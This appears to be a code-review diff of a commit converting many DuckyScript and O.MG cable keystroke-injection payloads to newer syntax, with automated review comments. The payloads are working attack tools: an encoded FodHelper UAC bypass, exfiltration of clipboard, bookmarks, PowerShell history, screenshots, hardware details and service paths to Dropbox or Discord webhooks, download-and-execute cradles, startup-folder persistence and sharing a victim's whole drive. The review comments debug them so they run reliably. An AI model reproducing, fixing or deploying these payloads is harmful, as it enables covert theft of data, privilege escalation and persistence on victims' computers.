BsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
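Review bot: the merged `STRINGLN powershell.exe -enc ...` line appears to continue on a second line (`lAG4AOwBTAHQAYQBy...;Start-Sleep -s 3;exit`); if that line break is in the file rather than only in the viewer, the continuation is an invalid command and the Base64 payload is truncated, so confirm it is one line. The wait between `STRINGLN powershell` and the `-enc` command also dropped from `DELAY 2000` to `DELAY 200`, and the `DELAY 500` after `GUI r` is gone entirely, which is not enough time for the Run dialog and then a PowerShell console to open; the one-liner is likely to be typed into the wrong window or lost. Restore those delays.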

View File

@ -1,22 +1,16 @@
REM FodCableII
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirements: OMG Firmware v.2.5 or higher
REM_BLOCK
FodCableII
Version 1.0
OS: Windows
Author: 0iphor13
Requirements: OMG Firmware v.2.5 or higher
Using FodHelper.exe to bypass UAC and get an elevated shell
END_REM
REM Using FodHelper.exe to bypass UAC and get an elevated shell
DELAY 500
DUCKY_LANG de
DELAY 1500
DELAY 2000
GUI r
STRINGLN powershell -NoP -NonI
DELAY 500
STRING powershell -NoP -NonI
DELAY 500
ENTER
DELAY 500
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
DELAY 200
ENTER
STRINGLN powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
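Review bot: `GUI r` is now immediately followed by `STRINGLN powershell -NoP -NonI` with no delay (the old version waited `DELAY 500` for the Run dialog), so the first characters may be typed before the dialog has focus; keep a short delay there. `DELAY 1500` and the newly added `DELAY 2000` are also consecutive, giving a 3.5 s idle that could be a single line.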

View File

@ -1,189 +1,88 @@
REM Title: Hard_Con_Exfil
REM Author: LulzAnarchyAnon
REM Description: This payload navagates it's way to Hardware, and Connection properties.
REM It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
REM It is then exfiltrated via a DropBox Upload.
REM Target: Windows 10
REM Props: Darren Kitchen
REM Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
REM Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM Props: Don't forget to Like and Subscribe!
REM Version: 1.0
REM Category: Exfiltration
REM_BLOCK
Title: Hard_Con_Exfil
Author: LulzAnarchyAnon
Description: This payload navagates it's way to Hardware, and Connection properties.
It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
It is then exfiltrated via a DropBox Upload.
Target: Windows 10
Props: Darren Kitchen
Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
Props: Don't forget to Like and Subscribe!
Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices.
This payload may need minor adjustments to run properly depending on
Attacker, and Target devices.
REM In the First stage the targets data is saved to the target device.
REM In the Second stage the loot is uploaded via dropbox.
In the First stage the targets data is saved to the target device.
In the Second stage the loot is uploaded via dropbox.
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM Stage 1
GUI
DELAY 100
STRING network properties
DELAY 200
STRINGLN network properties
REPEAT 3 TAB
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 1000
ENTER
DELAY 500
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 500
STRINGLN notepad
CTRL v
DELAY 500
CTRL s
DELAY 500
ALT d
DELAY 500
STRING %USERPROFILE%\Downloads
DELAY 500
ENTER
DELAY 200
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
STRING targetloot
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
ALT F4
STRINGLN %USERPROFILE%\Downloads
REPEAT 6 TAB
STRINGLN targetloot
REPEAT 2 ALT F4
DELAY 2000
REM Stage 2
GUI r
DELAY 200
STRING powershell
DELAY 200
ENTER
DELAY 2000
STRING function DropBox-Upload {
DELAY 500
ENTER
STRING [CmdletBinding()]
DELAY 500
ENTER
STRING param (
DELAY 500
ENTER
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING" # Replace with your DropBox Access Token
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
STRINGLN param (
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRINGLN [string]$SourceFilePath
STRINGLN )
STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRINGLN "
STRINGLN " # Replace with your DropBox Access Token
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING }
DELAY 5000
GUI r
DELAY 200
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRING targetloot
DELAY 1000
GUI r
DELAY 500
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRING targetloot
DELAY 500
ALT h
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
REPEAT 5 TAB
ENTER
DELAY 500
ALT F4
DELAY 1000
CTRL v
DELAY 5000
STRING | DropBox-Upload
DELAY 500
ENTER
STRINGLN | DropBox-Upload
DELAY 5000
ENTER
ALT F4
DELAY 100
ENTER
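Review bot: `REPEAT 6 TAB` replaces seven TAB presses in the Save As dialog (count the old `TAB`/`DELAY 100` pairs between `%USERPROFILE%\Downloads` and `STRING targetloot`), so `targetloot` will be typed into the wrong control; it should be `REPEAT 7 TAB`. The access-token assignment is still split across three STRINGLN lines (`"YOUR-DROPBOX-ACCESS-TOKEN-HERE`, `"`, `" # Replace ...`), which leaves an unterminated string in PowerShell; collapse it to one `$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE" # Replace with your DropBox Access Token` and, for consistency with the other files in this commit, make the token a DEFINE. Finally, `STRING }` closing the function was not converted to `STRINGLN`, so the function definition is never completed before `| DropBox-Upload` is invoked.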

View File

@ -1,16 +1,17 @@
REM Title: Bookmark-Hog
REM_BLOCK
Title: Bookmark-Hog
Author: atomiczsec
Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
Target: Windows 10, 11
REM Author: atomiczsec
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM Target: Windows 10, 11
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
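Review bot: `iwr #URLdl=1` keeps the defect of the original `< Your Shared link ...> dl=1`: the `?` before `dl=1` is missing, and with the define glued to `dl` the name the compiler sees is `#URLdl`, which is not what was defined; write it as `#URL?dl=1` (or end the DEFINE value with the `?`). The REM_BLOCK also inherits the stray `mode con:cols=14 lines=1` fused onto `properly`, which is leftover from another payload and should be deleted.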

View File

@ -1,17 +1,19 @@
REM Title: Copy-And-Waste
REM_BLOCK
Title: Copy-And-Waste
Author: atomiczsec & I am Jakoby
Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
Target: Windows 10, 11
REM Author: atomiczsec & I am Jakoby
Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DEFINE #URL PASTEBIN LINK FOR BAT
DUCKY_LANG US
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
GUI r
DELAY 100
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URL).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URL).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
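Review bot: both `iwr` calls now fetch `#URL`, but the original used two different placeholders, `PASTEBIN LINK FOR BAT` for `l.bat` and `PASTEBIN LINK FOR PS1` for `c.ps1`; with a single define the startup .bat and c.ps1 become the same file, which changes the payload's behaviour. Add a second define (for example `#PS1URL`) for the second `iwr`. Changing `GUI` to `GUI r` and the bare `DELAY` to `DELAY 100` are correct fixes.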

View File

@ -1,101 +1,78 @@
REM --------------------------------------------------------------------
REM Title: O.MG Plug Basic Local Exfiltrator
REM Description: Exfiltrates via O.MG WebSocket API
REM Author: thisismyrobot
REM Target: Windows 10 (PowerShell)
REM Version: 1.0
REM Category: Exfiltration
REM
REM Local exfiltration for O.MG Plug Basic
REM
REM The Basic version of the Plug cannot do stuff like sharing a local
REM storage device (at least at the time of writing), so this code
REM does local exfil by connecting the target to the O.MG Plug's own
REM WiFi and using WebSockets to save data to a setting.
REM
REM This assumes a WiFi-enabled target of course.
REM
REM Retrieve the data by using the CTList custom command under Debug.
REM
REM Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
REM --------------------------------------------------------------------
REM_BLOCK
--------------------------------------------------------------------
Title: O.MG Plug Basic Local Exfiltrator
Description: Exfiltrates via O.MG WebSocket API
Author: thisismyrobot
Target: Windows 10 (PowerShell)
Version: 1.0
Category: Exfiltration
Local exfiltration for O.MG Plug Basic
The Basic version of the Plug cannot do stuff like sharing a local
storage device (at least at the time of writing), so this code
does local exfil by connecting the target to the O.MG Plug's own
WiFi and using WebSockets to save data to a setting.
This assumes a WiFi-enabled target of course.
Retrieve the data by using the CTList custom command under Debug.
Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
--------------------------------------------------------------------
END_REM
DEFINE #PASSWORD Secret password
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING cd c:\temp
ENTER
STRINGLN powershell
STRINGLN cd c:\temp
REM -----------------------
REM Collect info to exfil.
REM -----------------------
STRING $e = "Secret password"
STRING $e = "#PASSWORD"
ENTER
REM ----------------------------------
REM Connect to the O.MG AP.
REM ----------------------------------
STRING echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
ENTER
STRINGLN echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
STRING netsh wlan add profile "profile.xml"
ENTER
STRINGLN netsh wlan add profile "profile.xml"
STRING netsh wlan connect name=O.MG
ENTER
STRINGLN netsh wlan connect name=O.MG
REM --------------------------------
REM Establish websocket connection.
REM --------------------------------
STRING $ws = New-Object Net.WebSockets.ClientWebSocket
ENTER
STRING $ct = New-Object Threading.CancellationToken($false)
ENTER
STRING $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
ENTER
STRING do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket
STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted)
REM --------
REM Upload.
REM --------
STRING $ct = New-Object Threading.CancellationToken($false)
ENTER
STRING $command = "[custom]CTSet`tcaptured`t$e"
ENTER
STRING [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
ENTER
STRING $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $command = "[custom]CTSet`tcaptured`t$e"
STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
DELAY 1000
REM ----------
REM Clean up.
REM ----------
STRING netsh wlan disconnect
ENTER
STRING netsh wlan delete profile name="O.MG"
ENTER
STRING del .\profile.xml
ENTER
STRING exit
ENTER
STRINGLN netsh wlan disconnect
STRINGLN netsh wlan delete profile name="O.MG"
STRINGLN del .\profile.xml
STRINGLN exit
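Review bot: `STRING $e = "#PASSWORD"` followed by `ENTER` is the one line in this file that was not converted to `STRINGLN`; make it consistent. With `DEFAULT_DELAY 500` in effect, the old `DELAY 1000` that gave PowerShell time to start before `cd c:\temp` is gone and only 500 ms remain, so the first command may land in the Run dialog; add an explicit `DELAY 1000` after `STRINGLN powershell`. Also, the `DEFINE #PASSWORD Secret password` value contains a space; confirm the compiler takes everything after the name as the value.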

View File

@ -1,16 +1,17 @@
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM_BLOCK
Title: Powershell-History
Author: atomiczsec
Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
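Review bot: the `REM Remember ...` and `REM Also ...` lines keep their `REM` prefix inside the new `REM_BLOCK`, unlike the other files converted in this commit; drop the prefix. `#URLdl=1` in the STRINGLN line is missing the `?` and glues the define name to `dl` (it should be `#URL?dl=1`), and the text `mode con:cols=14 lines=1` fused onto `properly` in the comment is stray and should go.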

View File

@ -1,16 +1,20 @@
REM Title: Printer-Recon
REM_BLOCK
Title: Printer-Recon
Author: atomiczsec
REM Author: atomiczsec
Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
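Review bot: same two problems as in Powershell-History: `iwr #URLdl=1` is missing the `?` before `dl=1` (the REM text asks for `?dl=1`, so this should be `#URL?dl=1`), and the `properlymode con:cols=14 lines=1` fragment fused onto the comment line is carried into the new REM_BLOCK unchanged. The typo `explotation` in the Description line could be fixed in the same pass.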

View File

@ -1,25 +1,20 @@
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM_BLOCK
Title: Priv-Paths
Author: atomiczsec
Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
Target: Windows 10
END_REM
DEFINE #WEBHOOKURL YOUR-DISCORD-WEBHOOK
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
STRINGLN cmd
STRINGLN cd %HOMEPATH%
STRINGLN wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
STRINGLN curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" #WEBHOOKURL
STRINGLN del p.txt
STRINGLN exit
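Review bot: the start-up delays look stacked: `DELAY 2000`, `DEFAULT_DELAY 500`, `DELAY 3000`, `GUI r`, `DELAY 1000` all appear together, so if the old `DELAY 3000` and the `DELAY 1000` after `GUI r` were kept next to the new `DELAY 2000` / `DEFAULT_DELAY 500`, the payload now waits 5 s before opening Run and 1.5 s after, where the original waited 3 s and 1 s. Keep one of the two pairs. The `unqouted` typo in the Description line could also be fixed here.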

View File

@ -1,16 +1,18 @@
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM_BLOCK
Title: Pwn-Drive
Author: atomiczsec
Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl
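Review bot: the new last line `STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl` lost the URL altogether: the old line had `< Your Shared link for the intended file> dl=1`, and the hunk adds `DEFINE #URL ...`, but the define is never referenced, so `iwr dl=1` cannot resolve. It should read `iwr #URL?dl=1` (with the `?` the REM text calls for). The `properlymode con:cols=14 lines=1` fragment fused onto the comment line is also carried over unchanged.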

View File

@ -1,17 +1,22 @@
REM Title: Screen-Shock
REM_BLOCK
Title: Screen-Shock
Author: atomiczsec
REM Author: atomiczsec
Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
Target: Windows 10
REM Target: Windows 10
Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
DEFINE #URLBAT PASTEBIN LINK FOR BAT
DEFINE #URLPS1 PASTEBIN LINK FOR PS1
DUCKY_LANG US
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URLPS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
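Review bot: the argument-less `GUI` and `DELAY` lines are correctly replaced by `GUI r` / `DELAY 500`, but the command line itself still nests double quotes: inside `-Ep Bypass "echo ... > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";..."` the inner `"` closes the outer quoted argument, so the path containing the space in `Start Menu` is split when the Run dialog tokenises it. Escape the inner quotes as `\"` (the same convention the Priv-Paths `curl.exe -F "payload_json={\"username\"...` line in this commit uses); single quotes are not an option here because `$env:APPDATA` would not expand inside them.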

View File

@ -1,16 +1,21 @@
REM Title: Spotify-Spy
REM_BLOCK
Title: Spotify-Spy
REM Author: atomiczsec
Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
Target: Windows 10
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: DNS Exfiltrate WiFi names and preshared key
# Description: Exfiltrates WiFi names and PSK using DNS
